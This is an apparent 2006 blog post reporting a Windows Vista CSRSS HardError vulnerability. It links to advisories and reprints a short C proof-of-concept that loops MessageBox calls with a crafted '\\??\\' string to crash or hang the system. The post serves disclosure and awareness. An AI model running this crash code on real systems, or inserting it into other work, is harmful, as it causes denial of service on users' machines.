Personal tools

Number of visitors
since 27 March 2006
 
2006/12/22
Document Actions

First (One of the) vulnerability appears for Windows Vista

Click here to start saving with ING DIRECT!

Digg!

Even before the operating system has been released to public, vulnerabilities have started appearing for the next generation of Windows Operating system, Windows Vista. A vulnerability in Windows family of operating systems including Windows Vista has been published and a proof of concept code is publicly released.

Details

The vulnerability arises from the way Windows handles HardError Message within WINSRV.DLL which has a potential of remote code execution in the CSRSS (Client/Server Runtime Server System) process when supplied with a specially crafted input to the Message_Box() function using the  MB_SERVICE_NOTIFICATION flag and message/caption beginning with \\??\\. The POC code for the vulnerability is

#include <windows.h>

int main(void){
int i;
char bug1 [] ="\\??\\XXXX";
for(i = 0; i < 10; i ++)
 {
  MessageBox(0, bug1, bug1, MB_SERVICE_NOTIFICATION);
 }
}

Vulnerability seems to be memory corruption in kernel and causes system crash or hang after few attempts. It seems to happen because message is logged to event log and may point to some problem with event logs processing.

This vulnerability has been independently disclosed on 15th December and confirmed by Microsoft earlier today on MSRCTEAM weblog. Secunia has rated this as less critical as the vulnerability can only be exploited when a user is logged on locally and the remote attacker will get the privileges of the locally logged on user.

Closing thoughts

Some people may question my judgment in putting up the exploit code here on my website before a patch is available from Microsoft. The exploit code is already available in the wild and there are no restrictions on it. At least people will be aware of what they are up against.

For more details:

Microsoft Original Advisory:

http://blogs.technet.com/msrc/archive/2006/12/22/new-report-of-a-windows-vulnerability.aspx

Full Disclosure:

http://lists.grok.org.uk/pipermail/full-disclosure/2006-December/051394.html

Determina Security research:

http://www.determina.com/security.research/vulnerabilities/csrss-harderror.html

Category(s)
Windows
Information Security
The URL to Trackback this entry is:
http://www.dharwadkar.com/weblog/vista_vulner/tbping
Add comment

You can add a comment by filling out the form below. Plain text formatting.

(Required)
(Required)

Cloud VPS Hosting

Acronis True Image 2012 Special offer 125x125
iTunes, App Store, iBookstore, and Mac App Store

 
    This site is: